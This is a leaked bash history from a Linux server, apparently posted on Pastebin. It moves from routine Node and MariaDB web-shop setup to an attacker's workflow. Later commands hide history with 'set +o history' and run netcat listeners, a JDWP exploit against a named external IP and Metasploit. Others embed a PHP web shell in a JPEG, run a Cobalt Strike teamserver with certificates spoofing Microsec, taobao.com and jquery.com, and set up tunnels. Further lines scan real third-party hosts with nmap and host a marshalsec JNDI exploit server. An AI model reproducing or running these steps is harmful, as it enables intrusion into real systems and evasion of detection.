Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #1620810877
- set +o history;
- #1620810892
- yum install update
- #1620810899
- yum install upgrade
- #1620810905
- yum update
- #1620811330
- yum upgrade
- #1620811346
- node -V
- #1620811359
- yum install nodejs
- #1620811382
- mysql -uroot -p
- #1620811393
- yum install mariadb
- #1620811508
- yum install mariadb-server
- #1620811528
- yum install mariadb-client
- #1620811542
- mysql_secure_installation
- #1620811560
- systemctl enable mariadb --now
- #1620811570
- systemctl start mariadb
- #1620811577
- mysql_secure_installation
- #1620811609
- mysql -uroot -p
- #1620811859
- git clone -b 2.0.0 http://git.btkj6.com/boss/ggb-shop.git
- #1620811864
- yum install git
- #1620811874
- git clone -b 2.0.0 http://git.btkj6.com/boss/ggb-shop.git
- #1620811910
- ls
- #1620811913
- cd ggb-shop/
- #1620811921
- npm install
- #1620811937
- cd app
- #1620811940
- npm install
- #1620811948
- cd ../pc
- #1620811952
- npm install
- #1620811970
- cd ../
- #1620812016
- node build.js all
- #1620812349
- node build.js cleardist
- #1620812403
- node build.js clear
- #1620812407
- node build.js server
- #1620812427
- node build.js admin
- #1620812442
- node build.js web
- #1620812459
- node build.js app
- #1620812476
- node build.js extend
- #1620812553
- cd dist/server
- #1620812612
- vi /etc/my.conf
- #1620812700
- vi /etc/my.cnf.d/mariadb-server.cnf
- #1620812751
- systemctl restart mariadb
- #1620812763
- mysql -uroot -p
- #1620812815
- ls
- #1620812830
- vi config.js
- #1620812848
- vi config.js
- #1620812871
- node init.js
- #1620812893
- node index.js 80
- #1620813020
- cd
- #1620813021
- ls
- #1620813023
- cd ggb-shop/
- #1620813024
- ls
- #1620813027
- cd pc
- #1620813027
- ls
- #1620813216
- cd ../
- #1620813217
- ls
- #1620813223
- node build.js web
- #1620813245
- cd dist/server
- #1620813249
- node index.js 80
- #1620813755
- npm install pm2 -g
- #1620813998
- pm2 start /root/ggb-shop/dist/server/index.js
- #1620814046
- pm2 save
- #1620814055
- pm2 startup
- #1620814063
- systemctl enable pm2-root
- #1620814069
- pm2 ls
- #1620818867
- w
- #1620818913
- pm2 ls
- #1620819486
- w
- #1620819536
- yum install caddy -y
- #1620819787
- dnf install 'dnf-command(copr)'
- #1620819810
- dnf copr enable @caddy/caddy
- #1620819848
- dnf install caddy
- #1620820078
- caddy
- #1620820141
- caddy help
- #1620820804
- service caddy status
- #1620820882
- service caddy status
- #1620820917
- caddy status
- #1620820923
- caddy
- #1620820957
- ls /etc
- #1620820977
- ls /etc/caddy
- #1620821097
- cat /etc/caddy/caddyfile
- #1620821117
- cat /etc/caddy/Caddyfile
- #1620821261
- systemctl enable caddy
- #1620821302
- Caddy service caddy start
- #1620821329
- service caddy start
- #1620821782
- vi /etc/caddy/Caddyfile
- #1620822212
- cat /etc/caddy/Caddyfile
- #1620822296
- vi /etc/caddy/Caddyfile
- #1620822454
- vi /etc/caddy/Caddyfile
- #1620822643
- vi /etc/caddy/Caddyfile
- #1620822971
- service caddy restart
- #1620824998
- service caddy restart
- #1620825080
- caddy adapt --config Caddyfile
- #1620825195
- service caddy restart
- #1620825242
- service caddy restart
- #1620825256
- service caddy stop
- #1620825259
- service caddy start
- #1620825369
- caddy reload
- #1620825460
- service caddy restart
- #1620825487
- service caddy restart
- #1620825495
- service caddy stop
- #1620825498
- service caddy start
- #1620825528
- service caddy status
- #1620825545
- ls /usr/local/caddy/
- #1620825604
- service caddy stop
- #1620825607
- service caddy status
- #1620825618
- service caddy start
- #1620825697
- service caddy start
- #1620825756
- systemctl reload caddy
- #1620825768
- systemctl status caddy
- #1620825791
- systemctl start caddy
- #1620825803
- systemctl start caddy
- #1620825846
- systemctl start caddy
- #1620825917
- systemctl reload caddy
- #1620826018
- systemctl reload caddy
- #1620826048
- systemctl reload caddy
- #1620826096
- systemctl reload caddy
- #1620826103
- systemctl reload caddy
- #1620826117
- systemctl reload caddy
- #1620826215
- systemctl reload caddy
- #1620826490
- systemctl reload caddy
- #1620826493
- systemctl reload caddy
- #1620826624
- systemctl reload caddy
- #1620826698
- systemctl reload caddy
- #1620826742
- curl http://localhost:7000
- #1620826749
- curl http://localhost:7000/web
- #1620826815
- systemctl reload caddy
- #1620827278
- systemctl reload caddy
- #1620827390
- dnf uninstall caddy
- #1620827446
- dnf remove caddy
- #1620827558
- yum install nginx
- #1620827582
- systemctl enable nginx
- #1620827587
- systemctl start nginx
- #1620827592
- systemctl status nginx
- #1620827706
- ls /etc
- #1620827725
- ls /etc/nginx
- #1620827756
- ls /etc/nginx/conf.d/
- #1620827784
- touch /etc/nginx/conf.d/ggbggb.com.conf
- #1620828168
- systemctl restart nginx
- #1620828377
- systemctl restart nginx
- #1620832072
- yum uninstall nginx
- #1620832086
- yum remove nginx
- #1620832127
- yum install -y wget && wget -O install.sh http://download.bt.cn/install/install_6.0.sh && sh install.sh
- #1620832550
- yum remove mariadb
- #1620832876
- ls
- #1620832882
- node init.js
- #1620832896
- node init.js
- #1620833564
- pm2
- #1620833575
- pm2 -h
- #1620833615
- pm2 ls
- #1620833624
- pm2 stop 0
- #1620833630
- ls
- #1620833637
- node index.js
- #1620833677
- node index.js 80
- #1620833686
- pm2 ls
- #1620833691
- pm2 start 0
- #1620834296
- /etc/init.d/bt default
- #1620861306
- ls
- #1620861306
- set +o history;
- #1620861308
- cd ggb-shop/
- #1620861309
- ls
- #1620861322
- node build.js web
- #1620861377
- node build.js web
- #1620861594
- node build.js web
- #1620861912
- node build.js web
- #1620861982
- node build.js web
- #1620862208
- node build.js web
- #1620862838
- node build.js web
- #1620862951
- node build.js web
- #1620863000
- node build.js web
- #1620863633
- node build.js web
- #1620863704
- node build.js web
- #1620863772
- node build.js web
- #1620869239
- node build.js web
- #1620869311
- node build.js web
- #1620869620
- node build.js web
- #1620869721
- node build.js web
- #1620871371
- node build.js app
- #1620872117
- node build.js app
- #1620872173
- node build.js app
- #1620872257
- node build.js app
- #1620872284
- node build.js app
- #1620872345
- node build.js app
- #1620872442
- node build.js web
- #1620872558
- node build.js web
- #1620872600
- node build.js web
- #1620872638
- node build.js app
- #1620872690
- node build.js app
- #1620995416
- w
- #1620995417
- set +o history;
- #1620995420
- pm2 ls
- #1620995426
- pm2 stop 0
- #1620995428
- ls
- #1620995430
- cd ggb-shop/
- #1620995433
- cd dist/server
- #1620995434
- ls
- #1620995439
- node index.js
- #1620999679
- ls
- #1620999680
- cd
- #1620999681
- ls
- #1620999683
- cd ggb-shop/
- #1620999683
- ls
- #1620999690
- node build.js app
- #1620999708
- cd dist/server
- #1620999711
- node index.js
- #1620999921
- pm2 start 0
- #1621000150
- reboot
- #1624584477
- ls
- #1624584478
- bt
- #1624585047
- ls
- #1624585050
- cd /www
- #1624585051
- ls
- #1624585058
- cd /wwwroot
- #1624585063
- cd wwwroot
- #1624585065
- ls
- #1624585068
- cd pro.cloudreve.org/
- #1624585069
- ls
- #1624585073
- cd v3
- #1624585074
- ls
- #1624585086
- chmod 777 prosign
- #1624585096
- nohup ./prosign &
- #1624585924
- cd ../
- #1624585966
- grep -r -l "changeRoot" /www/wwwroot/pro,cloudreve.org
- #1624586023
- grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org
- #1624586025
- /grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org
- #1624586031
- grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org/
- #1624586039
- pwd
- #1624586069
- grep -r -l changeRoot /www/wwwroot/pro,cloudreve.org/*
- #1624586076
- grep -R -l changeRoot /www/wwwroot/pro,cloudreve.org/*
- #1624586099
- grep -Rw -l changeRoot /www/wwwroot/pro,cloudreve.org/*
- #1624586105
- grep -Rw changeRoot /www/wwwroot/pro,cloudreve.org/*
- #1624586148
- find . -name "*.php" | xargs grep "changeRoot"
- #1624588146
- exit
- #1624588260
- cd /www/wwwreoot
- #1624588267
- cd /www/wwwroot
- #1624588268
- ls
- #1624588270
- cd pro.cloudreve.org/
- #1624588271
- ls
- #1624588274
- cd v3
- #1624588275
- ls
- #1624588760
- ./cloudreve
- #1624588793
- ./cloudreve
- #1624589131
- ./cloudreve
- #1624589156
- ./cloudreve
- #1624590677
- exit
- #1625797087
- nc
- #1625797105
- nc -vv -l -p 4451
- #1625797163
- bt
- #1625797248
- nc -vv -l -p 4451
- #1625834082
- ls
- #1625834085
- exit
- #1626019977
- bt
- #1626021052
- mysql
- #1626021078
- mysql -u root -p
- #1626023133
- exit
- #1626458686
- id
- #1626458689
- ls
- #1626458694
- exit
- #1627950025
- set +o history;
- #1627950023
- bt
- #1629189144
- set +o history;
- #1629189192
- ls
- #1629189195
- wget https://raw.githubusercontent.com/IOActive/jdwp-shellifier/master/jdwp-shellifier.py
- #1629189197
- ls
- #1629189221
- phon jdwp-shellifier.py -t 124.71.101.66 -p 8000
- #1629189227
- python jdwp-shellifier.py -t 124.71.101.66 -p 8000
- #1629189233
- python3 jdwp-shellifier.py -t 124.71.101.66 -p 8000
- #1629189238
- python2 jdwp-shellifier.py -t 124.71.101.66 -p 8000
- #1629190881
- bt
- #1629190945
- nc -vv -l -p 4451
- #1629198295
- exit
- #1629198293
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1629323746
- curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
- #1629323762
- chmod +x msfinstall
- #1629323776
- ./msfinstall
- #1629323854
- msfconsole
- #1629323982
- msfconsole
- #1629324072
- ls
- #1629324077
- exit
- #1629326595
- set +o history;
- #1629326598
- ps
- #1629326604
- bt
- #1629326760
- msfconsole
- #1629334932
- set +o history;
- #1629334934
- msfconsole
- #1629342734
- msfconsole
- #1629342731
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1629364593
- set +o history;
- #1629364593
- msfconsole
- #1629599647
- set +o history;
- #1629599656
- bt
- #1629625434
- set +o history;
- #1629625435
- exit
- #1631337986
- set +o history;
- #1631338026
- set +o history;
- #1632928886
- set +o history;
- #1632928886
- bt
- #1632955381
- exit
- #1633932777
- set +o history;
- #1633932777
- bt
- #1633946037
- exit
- #1634864385
- set +o history;
- #1634864385
- bt
- #1635307783
- ls
- #1635307783
- set +o history;
- #1635307785
- bt
- #1635307829
- ls
- #1635338337
- cd /www
- #1635338342
- cd wwwroot
- #1635338351
- cd pro.cloudreve.org/
- #1635338352
- ls
- #1635338356
- cd v3
- #1635338363
- ./prosign
- #1635376576
- ./prosign &
- #1635376717
- ps
- #1635377279
- pkill -9 790230
- #1635377280
- ps
- #1635377311
- pkill -9 prosign
- #1635377313
- ps
- #1635753674
- set +o history;
- #1635753697
- git clone https://github.com/dlegs/php-jpeg-injector.git
- #1635753700
- ls
- #1635753703
- cd php-jpeg-injector/
- #1635753704
- ls
- #1635753746
- python3 gd-jpeg.py cat.jpg '<?php system($_GET["cmd"]);?>' infected_cat.jpg
- #1635753786
- python gd-jpeg.py cat.jpg ‘<?php phpinfo()?>’ cat.jpg
- #1635753795
- python3 gd-jpeg.py cat.jpg ‘<?php phpinfo()?>’ cat.jpg
- #1635753814
- python3 gd-jpeg.py cat.jpg ‘<?php phpinfo();?>’ cat.jpg
- #1635753859
- python3 gd-jpeg.py cat.jpg '<?php phpinfo();?>' cat.jpg
- #1635753943
- python2 demo.py bb.gif '<?phpinfo();?>' 2.gif
- #1635753949
- python demo.py bb.gif '<?phpinfo();?>' 2.gif
- #1635753959
- python3 demo.py bb.gif '<?phpinfo();?>' 2.gif
- #1635754044
- python demo.py
- #1635754059
- python demo.py bb.gif '1' 22.gif
- #1635754341
- php
- #1635754414
- php.php cat.jpg 212.jpg
- #1635754420
- yum install php
- #1635754740
- python3 gd-jpeg.py cat.gif '<?php phpinfo();?>' cat2.gif
- #1635769801
- python3 gd-jpeg.py cat.gif '<?php phpinfo();?>' cat2.gif
- #1635769806
- exit
- #1636068048
- set +o history;
- #1636068066
- ls
- #1636068075
- unzip CSAgent.zip
- #1636068078
- ls
- #1636068115
- ./teamserver 43.129.223.220 2233262
- #1636068129
- chmod +x teamserver
- #1636068133
- ./teamserver 43.129.223.220 2233262
- #1636068142
- yum install java
- #1636068173
- java
- #1636068206
- java --version
- #1636068221
- yum -y install java-1.8.0-openjdk*
- #1636068296
- rm -f /var/lib/rpm/__db*
- #1636068306
- rpm --rebuilddb
- #1636068316
- yum -y update
- #1636069755
- yum -y install java-1.8.0-openjdk*
- #1636070377
- ./teamserver 43.129.223.220 2233262
- #1636070627
- ./teamserver 43.129.223.220 2233262
- #1636073032
- cls
- #1636073035
- clear
- #1636073043
- ./teamserver 43.129.223.220 2233262 ./me.profile
- #1636074001
- ./teamserver 43.129.223.220 2233262
- #1636097801
- wget https://github.com/fatedier/frp/releases/download/v0.38.0/frp_0.38.0_linux_amd64.tar.gz
- #1636097832
- tar zxf frp_0.38.0_linux_amd64.tar.gz
- #1636097836
- ls
- #1636097839
- cd frp_0.38.0_linux_amd64/
- #1636097846
- vi frps.ini
- #1636097926
- ./frps -c frps.ini
- #1636098101
- vi frps.ini
- #1636098115
- ./frps -c frps.ini
- #1636099145
- cd
- #1636099146
- ls
- #1636099617
- msfconsole
- #1636101252
- ./teamserver 43.129.223.220 2233262
- #1636152506
- exit
- #1636636432
- set +o history;
- #1636636433
- ls
- #1636636438
- ps
- #1636636459
- wget -N --no-check-certificate git.io/f.sh && chmod +x f.sh && bash f.sh install
- #1636636729
- bash f.sh dashboard_port
- #1636636959
- bash f.sh uninstall
- #1636637011
- ls
- #1636637019
- rm -rf f.sh
- #1636637022
- ls
- #1636637025
- wget -N --no-check-certificate https://raw.githubusercontent.com/335622119/btp_frps/master/install.sh && chmod +x f.sh && bash f.sh
- #1636637035
- install.sh
- #1636637045
- ./install.sh
- #1636637054
- chmod +x install.sh
- #1636637055
- ./install.sh
- #1636637069
- ./install.sh install
- #1636637076
- ./install.sh download
- #1636637105
- git clone https://github.com/335622119/btp_frps.git
- #1636637109
- ls
- #1636637114
- cd btp_frps/
- #1636637115
- ls
- #1636637126
- ./install.sh install
- #1636637132
- chmod +x install.sh
- #1636637135
- ./install.sh
- #1636637138
- ./install.sh install
- #1636637312
- cd
- #1636637313
- wget -O - https://raw.githubusercontent.com/Zo3i/OCS/master/docker/docker-all2.sh | sh
- #1636637426
- ls
- #1636637430
- cd btp_frps/
- #1636637442
- ls
- #1636637449
- ./install.sh
- #1636637462
- ./install.sh download
- #1636637466
- ./install.sh install
- #1636637523
- ps
- #1636637584
- wget -N --no-check-certificate git.io/f.sh && chmod +x f.sh && bash f.sh install
- #1636637595
- ps
- #1636637685
- systemctl start frps
- #1636637771
- ps
- #1636637780
- f.sh uninstall
- #1636637795
- ls
- #1636637802
- bash install.sh
- #1636637805
- bash install.sh download
- #1636637813
- bash f.sh unistall
- #1636637820
- bash f.sh uninstall
- #1636638542
- ps
- #1636638552
- cd
- #1636638553
- ls
- #1636638733
- wget https://raw.githubusercontent.com/MvsCode/frps-onekey/master/install-frps.sh -O ./install-frps.sh
- #1636638738
- chmod 700 ./install-frps.sh
- #1636638742
- ./install-frps.sh install
- #1636897552
- set +o history;
- #1636897623
- wget -O https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
- #1636897627
- wget https://github.com/ehang-io/nps/releases/download/v0.26.10/linux_amd64_server.tar.gz
- #1636897631
- ls
- #1636897678
- tar -xzvf linux_amd64_server.tar.gz
- #1636897680
- ls
- #1636897686
- cd nps
- #1636897686
- ls
- #1636897702
- ./nps install
- #1636897718
- nps start
- #1636897940
- ls /etc/nps
- #1636897945
- ls /etc/nps/conf
- #1636897960
- cat /etc/nps/conf/nps.conf
- #1636898323
- nps reload
- #1636898327
- nps
- #1636898373
- vi /etc/nps/conf/nps.conf
- #1636898387
- nps stop
- #1636898389
- nps
- #1636898396
- nps stop
- #1636898398
- vi /etc/nps/conf/nps.conf
- #1636898419
- nps
- #1636899516
- npc stop
- #1636899520
- nps stop
- #1636899599
- nps uninstall
- #1636900264
- nps
- #1636900276
- ./nps uninstall
- #1636900285
- nps stop
- #1636900291
- ./nps uninstall
- #1636900293
- nps
- #1636900326
- nps restart
- #1636900329
- ps
- #1636900361
- nps stop
- #1636901154
- nps stop
- #1636901158
- reboot
- #1636901218
- set +o history;
- #1636901222
- nps uninstall
- #1636901228
- nps stop
- #1636901232
- ./nps stop
- #1636901234
- ps
- #1636901241
- wget http://121.42.171.79:9100/ngrok/server/linux_amd64.zip
- #1636901259
- unzip linux_amd64.zip
- #1636901263
- ls
- #1636901296
- cd linux_amd64/
- #1636901297
- ls
- #1636901329
- ./ngrokd --domain="ngrok.ggbggb.com"
- #1636901347
- cd
- #1636901351
- nps install
- #1636901358
- nps uninstall
- #1636901363
- nps uninstall
- #1636901378
- ccd /etc/nps
- #1636901381
- cd /etc/nps
- #1636901383
- ls
- #1636901385
- cd conf
- #1636901386
- ls
- #1636901392
- cat nps.conf
- #1636901421
- cd
- #1636901422
- wget --no-check-certificate https://github.com/clangcn/ngrok-one-key-install/raw/master/install_ngrok.sh -O ./install_ngrok.sh
- #1636901428
- chmod 500 ./install_ngrok.sh
- #1636901433
- ./install_ngrok.sh install
- #1636901548
- ls
- #1636901663
- /etc/init.d/ngrokd confi
- #1636901671
- /etc/init.d/ngrokd config
- #1636901696
- /etc/init.d/ngrokd restart
- #1636901728
- /etc/init.d/ngrokd status
- #1636901740
- /etc/init.d/ngrokd userlist
- #1636902822
- ./install_ngrok.sh install
- #1636902828
- ./install_ngrok.sh uninstall
- #1636902841
- ./install_ngrok.sh install
- #1636902943
- /etc/init.d/ngrokd adduser
- #1636903505
- /etc/init.d/ngrokd restart
- #1636904727
- /etc/init.d/ngrokd stop
- #1636904731
- ./install_ngrok.sh uninstall
- #1636904755
- git clone
- #1636904759
- git clone https://github.com/panyongwei/ngrok.git
- #1636904762
- ls
- #1636904771
- cd ngrok
- #1636904772
- ls
- #1636904781
- chmod +x ngrok.sh
- #1636904786
- ./ngrok.sh
- #1636905036
- ./ngrok.sh
- #1636905072
- yum install gcc -y
- #1636905084
- cd
- #1636905093
- go version
- #1636905105
- yum install -y mercurial git bzr subversion golang golang-pkg-windows-amd64 golang-pkg-windows-386
- #1636905135
- yum install -y mercurial git bzr subversion golang golang-pkg-windows-amd64
- #1636905237
- ls
- #1636905370
- ./install_ngrok.sh install
- #1636905625
- /etc/init.d/ngrokd restart
- #1636905629
- /etc/init.d/ngrokd info
- #1636905915
- /etc/init.d/ngrokd stop
- #1636905918
- ps
- #1636905978
- cd /usr/local/ngrok
- #1636905980
- cd bin
- #1636905987
- ./ngrokd -tlsKey="../server.key" -tlsCrt="../server.crt" -domain="ngrok.ggbggb.com" -httpAddr=":8080" -httpsAddr=":4433"
- #1636906024
- ./install_ngrok.sh uninstall
- #1636906027
- cd
- #1636906028
- ./install_ngrok.sh uninstall
- #1636906079
- cd /usr/local
- #1636906086
- wget http://www.golangtc.com/static/go/1.4.2/go1.4.2.linux-amd64.tar.gz
- #1636906222
- wget http://www.golangtc.com/static/go/1.4.2/go1.4.2.linux-amd64.tar.gz
- #1636906259
- wget https://dl.google.com/go/go1.17.3.linux-amd64.tar.gz
- #1636906284
- tar -zxvf go1.17.3.linux-amd64.tar.gz
- #1636906304
- ln -s /usr/local/go/bin/* /usr/bin/
- #1636906314
- go version
- #1636906327
- git clone https://github.com/inconshreveable/ngrok.git
- #1636906334
- ls
- #1636906349
- cd /usr/local
- #1636906351
- ls
- #1636906355
- wget https://dl.google.com/go/go1.17.3.linux-amd64.tar.gz
- #1636906372
- tar -zxvf go1.17.3.linux-amd64.tar.gz
- #1636906389
- ln -s /usr/local/go/bin/* /usr/bin/
- #1636906395
- go version
- #1636906402
- git clone https://github.com/inconshreveable/ngrok.git
- #1636906412
- export GOPATH=/usr/local/ngrok/
- #1636906427
- export NGROK_DOMAIN="ngrok.ggbggb.com"
- #1636906432
- cd ngrok
- #1636906454
- openssl genrsa -out rootCA.key 2048
- #1636906460
- openssl req -x509 -new -nodes -key rootCA.key -subj "/CN=$NGROK_DOMAIN" -days 5000 -out rootCA.pem
- #1636906465
- openssl genrsa -out server.key 2048
- #1636906471
- openssl req -new -key server.key -subj "/CN=$NGROK_DOMAIN" -out server.csr
- #1636906480
- openssl x509 -req -in server.csr -CA rootCA.pem -CAkey rootCA.key -CAcreateserial -out server.crt -days 5000
- #1636906493
- cp rootCA.pem assets/client/tls/ngrokroot.crt
- #1636906506
- cp rootCA.pem assets/client/tls/ngrokroot.crt
- #1636906509
- cp server.crt assets/server/tls/snakeoil.crt
- #1636906520
- cp server.key assets/server/tls/snakeoil.key
- #1636906552
- cd /usr/local/go/src
- #1636906559
- GOOS=linux GOARCH=amd64 ./make.bash
- #1636906572
- cd /usr/local/ngrok/
- #1636906577
- GOOS=linux GOARCH=amd64 make release-server
- #1636906632
- yum search ngrok
- #1636906758
- GOOS=linux GOARCH=amd64 make release-server
- #1636906795
- make
- #1636906815
- make release-server
- #1636906824
- make server
- #1636906930
- vi /usr/local/ngrok/src/ngrok/log/logger.go
- #1636906990
- export GOPATH=/go
- #1636906994
- export CGO_ENABLED=0
- #1636906999
- export GOOS=linux GOARCH=386
- #1636907004
- make release-server release-client
- #1636907013
- export GOOS=linux GOARCH=amd64
- #1636907018
- make release-server release-client
- #1636907066
- cd /usr/local/go/src
- #1636907072
- GOOS=linux GOARCH=amd64 ./make.bash
- #1636907167
- cd /usr/local
- #1636907202
- wget https://dl.google.com/go/go1.4.2.linux-amd64.tar.gz
- #1636907213
- tar -zxvf go1.4.2.linux-amd64.tar.gz
- #1636907220
- ln -s /usr/local/go/bin/* /usr/bin/
- #1636907229
- export GOPATH=/usr/local/ngrok/
- #1636907243
- export NGROK_DOMAIN="ngrok.ggbggb.com"
- #1636907249
- cd ngrok
- #1636907257
- cd /usr/local/go/src
- #1636907261
- GOOS=linux GOARCH=amd64 ./make.bash
- #1636907290
- cd /usr/local/ngrok/
- #1636907294
- GOOS=linux GOARCH=amd64 make release-server
- #1636907306
- yum search go
- #1636907352
- yum search golang
- #1636907393
- cd /usr/local/go/src
- #1636907396
- GOOS=linux GOARCH=amd64 ./make.bash
- #1636907505
- go version
- #1636907779
- curl -L https://github.com/snail007/goproxy/blob/master/install_auto.sh | bash
- #1636907786
- cd
- #1636907794
- curl -L https://github.com/snail007/goproxy/blob/master/install_auto.sh | bash
- #1636907806
- wget https://github.com/snail007/goproxy/blob/master/install_auto.sh
- #1636907808
- ls
- #1636907847
- ./install_auto.sh
- #1636907859
- chmod +x ./install_auto.sh
- #1636907861
- ./install_auto.sh
- #1636907908
- wget https://raw.githubusercontent.com/snail007/goproxy/master/install_auto.sh
- #1636907912
- chmod +x ./install_auto.sh
- #1636907914
- ./install_auto.sh
- #1636908229
- proxy keygen -C proxy
- #1636908243
- proxy keygen -s -C proxy -c goproxy
- #1636908340
- ls
- #1636908504
- proxy bridge -p ":4040" -C proxy.crt -K proxy.key
- #1636908547
- proxy bridge -p ":4040" -C proxy.crt -K proxy.key --daemon
- #1636908556
- proxy server -r ":10090@:10090" -P "127.0.0.1:4040" -C proxy.crt -K proxy.key
- #1636908878
- rm /usr/bin/proxy && rm -rf /etc/proxy
- #1636906208
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1637023762
- ls
- #1637023763
- set +o history;
- #1637023780
- install_fros.sh
- #1637023794
- ./install_frps.sh
- #1637023798
- install_frps.sh
- #1637023805
- install-frps.sh
- #1637023809
- ls
- #1637023827
- install_auto.sh
- #1637023833
- ./install_auto.sh
- #1637023850
- rm /usr/bin/proxy && rm -rf /etc/proxy
- #1637023862
- ./install-frps.sh
- #1637023870
- ./install-frps.sh install
- #1637023923
- ./install-frps.sh uninstall
- #1637023940
- f.sh
- #1637023944
- ./f.sh
- #1637023946
- ls
- #1637024304
- ./install-frps.sh install
- #1637024435
- ./install-frps.sh install
- #1637034286
- w
- #1637034288
- exit
- #1637167544
- set +o history;
- #1637167623
- exit
- #1637167719
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1637201570
- set +o history;
- #1637201578
- yum install nmap
- #1637201628
- nmap -p 1-65535 -T4 -A -v 39.100.227.95
- #1637207300
- nmap -p 1-65535 -T4 -A -v 43.240.74.146
- #1637499424
- ls
- #1637499425
- set +o history;
- #1637499433
- ./teamserver
- #1637499438
- ./teamserver -h
- #1637499479
- ./teamserver 43.129.223.220 50050
- #1637499567
- ./teamserver 43.129.223.220 4433
- #1637499597
- ./teamserver 127.0.0.1 2233262
- #1637499618
- ./teamserver 43.129.223.220 2233262
- #1637505040
- ./teamserver 43.129.223.220 2233262
- #1637509993
- ./teamserver 43.129.223.220 2233262
- #1637505040
- export LANG="en_US";export LANGUAGE="en_US";export LC_ALL="en_US";top
- #1637556599
- set +o history;
- #1637556606
- ./teamserver 43.129.223.220 2233262
- #1637558070
- keytool -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias Microsec.com -dname "CN=Microsec e-Szigno Root CA, OU=e-Szigno CA, O=Microsec Ltd., L=Budapest, S=HU, C=HU"
- #1637558097
- print_info "Generating X509 certificate and keystore (for SSL)"
- #1637558153
- keytool -list -v -keystore cobaltstrike.store
- #1637558187
- keytool -list -v -keystore cobaltstrike.store
- #1637558339
- keytool -list -v -keystore cobaltstrike.store
- #1637559021
- ls
- #1637559022
- set +o history;
- #1637559046
- ./c2lint me.profile
- #1637559058
- chmod +x ./c2lint
- #1637559060
- ./c2lint me.profile
- #1637559158
- vi teamserver
- #1637559906
- keytool -keystore cobaltstrike.store -storepass 2233262 -keypass 2233262 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
- #1637559929
- keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias taobao.com -dname "CN=US, OU=”taobao.com“, O=“Sofatest”, L=Beijing, ST=Cyberspace, C=CN"
- #1637559942
- keytool -list -v -keystore cobaltstrike.store
- #1637560708
- keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias jquery.com -dname "CN=US, OU=”jquery.com“, O=“jQuery”, L=America, ST=Cyberspace, C=US"
- #1637560716
- keytool -list -v -keystore cobaltstrike.store
- #1637560767
- keytool -keystore cobaltstrike.store -storepass Microsoft -keypass 2233262 -genkey -keyalg RSA -alias jquery.com -dname "CN=US, OU=”jquery.com“, O=“jQuery”, L=America, ST=Cyberspace, C=US"
- #1637560774
- keytool -list -v -keystore cobaltstrike.store
- #1637560782
- keytool -list -v -keystore cobaltstrike.store
- #1637560786
- keytool -list -v -keystore cobaltstrike.store
- #1637561018
- vi teamserver
- #1637561646
- cat teamserver
- #1637561774
- ./teamserver 43.129.223.220 2233262 me.profile
- #1637562143
- ./teamserver 43.129.223.220 2233262 me.profile
- #1637562438
- ./teamserver 43.129.223.220 2233262 me.profile
- #1637562499
- ./teamserver 43.129.223.220 2233262 me.profile
- #1637562613
- ./teamserver 43.129.223.220 2233262 me.profile
- #1637562834
- ./teamserver 43.129.223.220 2233262 ./me.profile
- #1637562944
- ./c2lint me.profile
- #1637563110
- ./c2lint me.profile
- #1637563132
- ./teamserver 43.129.223.220 2233262 ./me.profile
- #1638111222
- set +o history;
- #1638111231
- systemctl restart rpcs
- #1638111236
- systemctl restart rpc
- #1638111242
- ps
- #1638111244
- ls
- #1638111251
- systemctl restart frps
- #1638552085
- set +o history;
- #1638552309
- exit
- #1638572857
- set +o history;
- #1638573114
- w
- #1638573118
- exit
- #1638573383
- set +o history;
- #1639097810
- set +o history;
- #1639097813
- screen
- #1639097819
- yum install screen
- #1639097912
- python python -m SimpleHTTPServer 1092
- #1639097916
- python -m SimpleHTTPServer 8888
- #1639097922
- exit
- #1639097839
- screen
- #1639097926
- ls
- #1639097934
- yum install python
- #1639097946
- python -m SimpleHTTPServer 1092
- #1639097955
- python2 -m SimpleHTTPServer 8888
- #1639097963
- python3 -m SimpleHTTPServer 1092
- #1639097969
- python2 -m SimpleHTTPServer 1092
- #1639097997
- python2 -m SimpleHTTPServer 4040
- #1639098005
- screen -l
- #1639098050
- screen -l
- #1639098055
- screen -ls
- #1639098078
- exit
- #1639098076
- screen -r 1347783
- #1639098080
- screen -ls
- #1639098086
- screen -r 1346257
- #1639098122
- wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar
- #1639098126
- ls
- #1639098148
- chmod +x marshalsec-0.0.3-SNAPSHOT-all.jar
- #1639098176
- thouch Exploit.java
- #1639098185
- touch Exploit.java
- #1639098425
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639098538
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639098649
- javac Exploit.java
- #1639098662
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639098962
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDRMIfServer http://43.129.223.220:4040/#Exploit 4433
- #1639098974
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIrefServer http://43.129.223.220:4040/#Exploit 4433
- #1639098985
- java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://43.129.223.220:4040/#Exploit 4433
- #1639103450
- javac Exploit.java
- #1639103465
- javac Exploit.java
- #1639103485
